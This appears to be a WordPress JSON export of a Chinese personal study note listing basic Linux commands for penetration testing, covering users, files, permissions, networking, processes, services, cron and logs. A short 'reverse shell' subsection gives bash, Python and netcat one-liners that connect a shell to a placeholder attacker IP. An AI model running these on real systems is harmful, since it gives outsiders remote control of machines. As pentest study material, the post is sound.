Linux\u7cfb\u7edf\u662f\u670d\u52a1\u5668\u7aef\u6700\u5e38\u7528\u7684\u64cd\u4f5c\u7cfb\u7edf\uff0c\u5728\u6e17\u900f\u6d4b\u8bd5\u4e2d\u7ecf\u5e38\u4f1a\u63a5\u89e6\u5230\u3002\u638c\u63e1Linux\u57fa\u7840\u547d\u4ee4\u5bf9\u4e8e\u540e\u6e17\u900f\u3001\u6743\u9650\u7ef4\u6301\u3001\u5e94\u6025\u54cd\u5e94\u90fd\u975e\u5e38\u91cd\u8981\u3002\u672c\u6587\u6574\u7406\u4e86Linux\u5e38\u7528\u7684\u57fa\u7840\u547d\u4ee4\u3002<\/p>\n
# \u521b\u5efa\u7528\u6237\nuseradd \u7528\u6237\u540d\nuseradd -m \u7528\u6237\u540d # \u540c\u65f6\u521b\u5efa\u5bb6\u76ee\u5f55\nuseradd -s \/bin\/bash \u7528\u6237\u540d # \u6307\u5b9ashell\n\n# \u8bbe\u7f6e\u5bc6\u7801\npasswd \u7528\u6237\u540d\n\n# \u521b\u5efa\u7528\u6237\u5e76\u8bbe\u7f6e\u5bc6\u7801\nuseradd -m \u7528\u6237\u540d && echo \"\u7528\u6237\u540d:\u5bc6\u7801\" | chpasswd<\/code><\/pre>\n2. \u5220\u9664\u7528\u6237<\/h3>\n# \u5220\u9664\u7528\u6237\nuserdel \u7528\u6237\u540d\nuserdel -r \u7528\u6237\u540d # \u540c\u65f6\u5220\u9664\u5bb6\u76ee\u5f55<\/code><\/pre>\n3. \u7528\u6237\u7ec4\u64cd\u4f5c<\/h3>\n# \u521b\u5efa\u7528\u6237\u7ec4\ngroupadd \u7ec4\u540d\n\n# \u5c06\u7528\u6237\u6dfb\u52a0\u5230\u7ec4\nusermod -aG \u7ec4\u540d \u7528\u6237\u540d\n\n# \u67e5\u770b\u7528\u6237\u6240\u5c5e\u7ec4\ngroups \u7528\u6237\u540d\nid \u7528\u6237\u540d<\/code><\/pre>\n4. \u67e5\u770b\u7528\u6237<\/h3>\n# \u67e5\u770b\u6240\u6709\u7528\u6237\ncat \/etc\/passwd\n\n# \u67e5\u770b\u5f53\u524d\u7528\u6237\nwhoami\n\n# \u67e5\u770b\u767b\u5f55\u7528\u6237\nwho\nw<\/code><\/pre>\n\u4e8c\u3001\u6587\u4ef6\u64cd\u4f5c<\/h2>\n1. \u76ee\u5f55\u64cd\u4f5c<\/h3>\n# \u8fdb\u5165\u76ee\u5f55\ncd \u76ee\u5f55\u8def\u5f84\ncd .. # \u8fd4\u56de\u4e0a\u4e00\u7ea7\ncd ~ # \u8fd4\u56de\u5bb6\u76ee\u5f55\ncd - # \u8fd4\u56de\u4e0a\u6b21\u76ee\u5f55\n\n# \u67e5\u770b\u76ee\u5f55\u5185\u5bb9\nls\nls -a # \u663e\u793a\u9690\u85cf\u6587\u4ef6\nls -l # \u8be6\u7ec6\u4fe1\u606f\nls -la # \u663e\u793a\u6240\u6709\u6587\u4ef6\u8be6\u7ec6\u4fe1\u606f\n\n# \u521b\u5efa\u76ee\u5f55\nmkdir \u76ee\u5f55\u540d\nmkdir -p a\/b\/c # \u521b\u5efa\u591a\u7ea7\u76ee\u5f55\n\n# \u5220\u9664\u76ee\u5f55\nrmdir \u76ee\u5f55\u540d\nrm -rf \u76ee\u5f55\u540d # \u5f3a\u5236\u5220\u9664\u76ee\u5f55\u53ca\u5185\u5bb9<\/code><\/pre>\n2. \u6587\u4ef6\u64cd\u4f5c<\/h3>\n# \u67e5\u770b\u6587\u4ef6\u5185\u5bb9\ncat \u6587\u4ef6\u540d\nmore \u6587\u4ef6\u540d # \u5206\u9875\u67e5\u770b\nless \u6587\u4ef6\u540d # \u53ef\u4e0a\u4e0b\u7ffb\u9875\nhead -n 10 \u6587\u4ef6\u540d # \u67e5\u770b\u524d10\u884c\ntail -n 10 \u6587\u4ef6\u540d # \u67e5\u770b\u540e10\u884c\ntail -f \u6587\u4ef6\u540d # \u5b9e\u65f6\u67e5\u770b\n\n# \u521b\u5efa\u6587\u4ef6\ntouch \u6587\u4ef6\u540d\n\n# \u5199\u5165\u6587\u4ef6\necho \u5185\u5bb9 > \u6587\u4ef6\u540d # \u8986\u76d6\u5199\u5165\necho \u5185\u5bb9 >> \u6587\u4ef6\u540d # \u8ffd\u52a0\u5199\u5165\n\n# \u590d\u5236\u6587\u4ef6\ncp \u6e90\u6587\u4ef6 \u76ee\u6807\u8def\u5f84\ncp -r \u6e90\u76ee\u5f55 \u76ee\u6807\u8def\u5f84 # \u590d\u5236\u76ee\u5f55\n\n# \u79fb\u52a8\/\u91cd\u547d\u540d\nmv \u6587\u4ef6 \u76ee\u6807\u8def\u5f84\nmv \u65e7\u6587\u4ef6\u540d \u65b0\u6587\u4ef6\u540d\n\n# \u5220\u9664\u6587\u4ef6\nrm \u6587\u4ef6\u540d\nrm -f \u6587\u4ef6\u540d # \u5f3a\u5236\u5220\u9664<\/code><\/pre>\n3. \u6587\u4ef6\u6743\u9650<\/h3>\n# \u67e5\u770b\u6743\u9650\nls -l\n# -rwxr-xr-x 1 root root 4096 Jan 1 00:00 file\n# r=4 w=2 x=1\n\n# \u4fee\u6539\u6743\u9650\nchmod 755 \u6587\u4ef6\u540d\nchmod +x \u6587\u4ef6\u540d # \u6dfb\u52a0\u6267\u884c\u6743\u9650\nchmod -R 755 \u76ee\u5f55\u540d # \u9012\u5f52\u4fee\u6539\n\n# \u4fee\u6539\u6240\u6709\u8005\nchown \u7528\u6237\u540d:\u7ec4\u540d \u6587\u4ef6\u540d\nchown -R \u7528\u6237\u540d:\u7ec4\u540d \u76ee\u5f55\u540d<\/code><\/pre>\n\u4e09\u3001\u7f51\u7edc\u64cd\u4f5c<\/h2>\n1. \u67e5\u770b\u7f51\u7edc\u914d\u7f6e<\/h3>\n# \u67e5\u770bIP\u914d\u7f6e\nip addr\nifconfig\n\n# \u67e5\u770b\u8def\u7531\nip route\nroute -n\n\n# \u67e5\u770bDNS\ncat \/etc\/resolv.conf<\/code><\/pre>\n2. \u67e5\u770b\u7f51\u7edc\u8fde\u63a5<\/h3>\n# \u67e5\u770b\u7f51\u7edc\u8fde\u63a5\u548c\u7aef\u53e3\nnetstat -tulnp # \u663e\u793a\u6240\u6709\u76d1\u542c\u7aef\u53e3\nnetstat -anp # \u663e\u793a\u6240\u6709\u8fde\u63a5\nss -tulnp # \u66ff\u4ee3netstat\n\n# \u67e5\u627e\u6307\u5b9a\u7aef\u53e3\nnetstat -tulnp | grep \"\u7aef\u53e3\u53f7\"\n\n# \u67e5\u770bARP\u7f13\u5b58\narp -a<\/code><\/pre>\n3. \u7f51\u7edc\u6d4b\u8bd5<\/h3>\n# ping\u6d4b\u8bd5\nping \u76ee\u6807IP\nping -c 10 \u76ee\u6807IP # ping 10\u6b21\n\n# traceroute\u8def\u7531\u8ffd\u8e2a\ntraceroute \u76ee\u6807IP\n\n# telnet\u6d4b\u8bd5\u7aef\u53e3\ntelnet \u76ee\u6807IP \u7aef\u53e3\nnc -zv \u76ee\u6807IP \u7aef\u53e3 # \u6d4b\u8bd5\u7aef\u53e3\u8fde\u901a\u6027<\/code><\/pre>\n\u56db\u3001\u8fdb\u7a0b\u7ba1\u7406<\/h2>\n1. \u67e5\u770b\u8fdb\u7a0b<\/h3>\n# \u67e5\u770b\u6240\u6709\u8fdb\u7a0b\nps aux\nps -ef\n\n# \u67e5\u770b\u6307\u5b9a\u8fdb\u7a0b\nps aux | grep \u8fdb\u7a0b\u540d\n\n# \u5b9e\u65f6\u67e5\u770b\u8fdb\u7a0b\ntop\nhtop<\/code><\/pre>\n2. \u7ed3\u675f\u8fdb\u7a0b<\/h3>\n# \u6309PID\u7ed3\u675f\nkill PID\u53f7\nkill -9 PID\u53f7 # \u5f3a\u5236\u7ed3\u675f\n\n# \u6309\u8fdb\u7a0b\u540d\u7ed3\u675f\nkillall \u8fdb\u7a0b\u540d\npkill \u8fdb\u7a0b\u540d<\/code><\/pre>\n\u4e94\u3001\u670d\u52a1\u7ba1\u7406<\/h2>\n1. systemctl\u547d\u4ee4<\/h3>\n# \u67e5\u770b\u670d\u52a1\u72b6\u6001\nsystemctl status \u670d\u52a1\u540d\n\n# \u542f\u52a8\/\u505c\u6b62\/\u91cd\u542f\u670d\u52a1\nsystemctl start \u670d\u52a1\u540d\nsystemctl stop \u670d\u52a1\u540d\nsystemctl restart \u670d\u52a1\u540d\n\n# \u8bbe\u7f6e\u5f00\u673a\u542f\u52a8\nsystemctl enable \u670d\u52a1\u540d\nsystemctl disable \u670d\u52a1\u540d\n\n# \u67e5\u770b\u6240\u6709\u670d\u52a1\nsystemctl list-unit-files<\/code><\/pre>\n2. service\u547d\u4ee4<\/h3>\n# \u542f\u52a8\/\u505c\u6b62\/\u91cd\u542f\u670d\u52a1\nservice \u670d\u52a1\u540d start\nservice \u670d\u52a1\u540d stop\nservice \u670d\u52a1\u540d restart<\/code><\/pre>\n\u516d\u3001\u8ba1\u5212\u4efb\u52a1<\/h2>\n1. crontab<\/h3>\n# \u7f16\u8f91\u8ba1\u5212\u4efb\u52a1\ncrontab -e\n\n# \u67e5\u770b\u8ba1\u5212\u4efb\u52a1\ncrontab -l\n\n# \u5220\u9664\u8ba1\u5212\u4efb\u52a1\ncrontab -r\n\n# crontab\u683c\u5f0f\n# \u5206 \u65f6 \u65e5 \u6708 \u5468 \u547d\u4ee4\n# * * * * * command\n# 0 *\/2 * * * command # \u6bcf2\u5c0f\u65f6\u6267\u884c\n# 0 0 * * * command # \u6bcf\u59290\u70b9\u6267\u884c<\/code><\/pre>\n2. \u5176\u4ed6\u5b9a\u65f6\u4efb\u52a1<\/h3>\n# at\u4e00\u6b21\u6027\u4efb\u52a1\nat \u65f6\u95f4\nat> \u547d\u4ee4\nat> Ctrl+D\n\n# \u67e5\u770bat\u4efb\u52a1\natq<\/code><\/pre>\n\u4e03\u3001\u7cfb\u7edf\u4fe1\u606f<\/h2>\n# \u67e5\u770b\u7cfb\u7edf\u4fe1\u606f\nuname -a\ncat \/etc\/os-release\n\n# \u67e5\u770b\u5185\u6838\u7248\u672c\nuname -r\n\n# \u67e5\u770bCPU\u4fe1\u606f\nlscpu\ncat \/proc\/cpuinfo\n\n# \u67e5\u770b\u5185\u5b58\u4fe1\u606f\nfree -h\ncat \/proc\/meminfo\n\n# \u67e5\u770b\u78c1\u76d8\u4fe1\u606f\ndf -h\nlsblk<\/code><\/pre>\n\u516b\u3001\u65e5\u5fd7\u67e5\u770b<\/h2>\n# \u7cfb\u7edf\u65e5\u5fd7\ncat \/var\/log\/syslog\ncat \/var\/log\/messages\n\n# \u767b\u5f55\u65e5\u5fd7\ncat \/var\/log\/auth.log\nlast # \u67e5\u770b\u767b\u5f55\u5386\u53f2\nlastb # \u67e5\u770b\u5931\u8d25\u767b\u5f55\n\n# \u5e94\u7528\u65e5\u5fd7\ntail -f \/var\/log\/nginx\/access.log\ntail -f \/var\/log\/nginx\/error.log<\/code><\/pre>\n\u4e5d\u3001\u5e38\u7528\u6280\u5de7<\/h2>\n1. \u67e5\u770b\u7aef\u53e3\u5bf9\u5e94\u8fdb\u7a0b<\/h3>\n# \u67e5\u770b\u5360\u7528\u7aef\u53e3\u7684\u8fdb\u7a0b\nnetstat -tulnp | grep \":80\"\nlsof -i:80<\/code><\/pre>\n2. \u67e5\u627e\u6587\u4ef6<\/h3>\n# find\u547d\u4ee4\nfind \/ -name \"\u6587\u4ef6\u540d\"\nfind \/ -type f -name \"*.conf\"\nfind \/ -perm -4000 # \u67e5\u627eSUID\u6587\u4ef6<\/code><\/pre>\n3. \u6587\u672c\u5904\u7406<\/h3>\n# grep\u641c\u7d22\ngrep \"\u5173\u952e\u8bcd\" \u6587\u4ef6\u540d\ngrep -r \"\u5173\u952e\u8bcd\" \u76ee\u5f55\u540d\ngrep -i \"\u5173\u952e\u8bcd\" \u6587\u4ef6\u540d # \u5ffd\u7565\u5927\u5c0f\u5199\n\n# awk\u5904\u7406\nawk '{print $1}' \u6587\u4ef6\u540d\nawk -F: '{print $1}' \/etc\/passwd\n\n# sed\u66ff\u6362\nsed 's\/\u539f\u5185\u5bb9\/\u65b0\u5185\u5bb9\/g' \u6587\u4ef6\u540d<\/code><\/pre>\n4. \u53cd\u5f39Shell<\/h3>\n# bash\u53cd\u5f39\nbash -i >& \/dev\/tcp\/\u653b\u51fb\u673aIP\/\u7aef\u53e3 0>&1\n\n# python\u53cd\u5f39\npython -c 'import socket,subprocess,os;s=socket.socket();s.connect((\"\u653b\u51fb\u673aIP\",\u7aef\u53e3));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\"\/bin\/sh\",\"-i\"]);'\n\n# nc\u53cd\u5f39\nnc -e \/bin\/sh \u653b\u51fb\u673aIP \u7aef\u53e3<\/code><\/pre>\n\u603b\u7ed3<\/h2>\n
Linux\u57fa\u7840\u547d\u4ee4\u662f\u6e17\u900f\u6d4b\u8bd5\u7684\u57fa\u672c\u529f\uff0c\u9700\u8981\u719f\u7ec3\u638c\u63e1\uff1a<\/p>\n
\n- \u7528\u6237\u7ba1\u7406\uff1a<\/strong>\u521b\u5efa\u3001\u5220\u9664\u3001\u63d0\u6743\u3001SUID<\/li>\n
- \u6587\u4ef6\u64cd\u4f5c\uff1a<\/strong>\u589e\u5220\u6539\u67e5\u3001\u6743\u9650\u7ba1\u7406<\/li>\n
- \u7f51\u7edc\u64cd\u4f5c\uff1a<\/strong>IP\u914d\u7f6e\u3001\u7aef\u53e3\u67e5\u770b\u3001\u7f51\u7edc\u6d4b\u8bd5<\/li>\n
- \u8fdb\u7a0b\u7ba1\u7406\uff1a<\/strong>\u67e5\u770b\u3001\u7ed3\u675f\u8fdb\u7a0b<\/li>\n
- \u670d\u52a1\u7ba1\u7406\uff1a<\/strong>\u542f\u52a8\u3001\u505c\u6b62\u3001\u5f00\u673a\u542f\u52a8<\/li>\n
- \u8ba1\u5212\u4efb\u52a1\uff1a<\/strong>crontab\u5b9a\u65f6\u6267\u884c<\/li>\n
- \u65e5\u5fd7\u67e5\u770b\uff1a<\/strong>\u7cfb\u7edf\u65e5\u5fd7\u3001\u767b\u5f55\u65e5\u5fd7<\/li>\n<\/ol>\n
\n\u672c\u6587\u4e3a\u4e2a\u4eba\u5b66\u4e60\u7b14\u8bb0\uff0c\u6574\u7406\u4e86Linux\u5e38\u7528\u57fa\u7840\u547d\u4ee4\uff0c\u4f9b\u6e17\u900f\u6d4b\u8bd5\u53c2\u8003\u3002<\/p>\n<\/blockquote>\n","protected":false},"excerpt":{"rendered":"
Linux\u57fa\u7840\u547d\u4ee4\u4e0e\u64cd\u4f5c \u6982\u8ff0 Linux\u7cfb\u7edf\u662f\u670d\u52a1\u5668\u7aef\u6700\u5e38\u7528\u7684\u64cd\u4f5c\u7cfb\u7edf\uff0c\u5728\u6e17\u900f\u6d4b\u8bd5\u4e2d\u7ecf\u5e38\u4f1a\u63a5\u89e6\u5230\u3002\u638c\u63e1Lin … <\/p>\n","protected":false},"author":3,"featured_media":174,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[10],"tags":[],"class_list":["post-157","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-pentest-basic"],"_links":{"self":[{"href":"https:\/\/www.redspear.cn\/index.php\/wp-json\/wp\/v2\/posts\/157","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.redspear.cn\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.redspear.cn\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.redspear.cn\/index.php\/wp-json\/wp\/v2\/users\/3"}],"replies":[{"embeddable":true,"href":"https:\/\/www.redspear.cn\/index.php\/wp-json\/wp\/v2\/comments?post=157"}],"version-history":[{"count":1,"href":"https:\/\/www.redspear.cn\/index.php\/wp-json\/wp\/v2\/posts\/157\/revisions"}],"predecessor-version":[{"id":158,"href":"https:\/\/www.redspear.cn\/index.php\/wp-json\/wp\/v2\/posts\/157\/revisions\/158"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.redspear.cn\/index.php\/wp-json\/wp\/v2\/media\/174"}],"wp:attachment":[{"href":"https:\/\/www.redspear.cn\/index.php\/wp-json\/wp\/v2\/media?parent=157"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.redspear.cn\/index.php\/wp-json\/wp\/v2\/categories?post=157"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.redspear.cn\/index.php\/wp-json\/wp\/v2\/tags?post=157"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}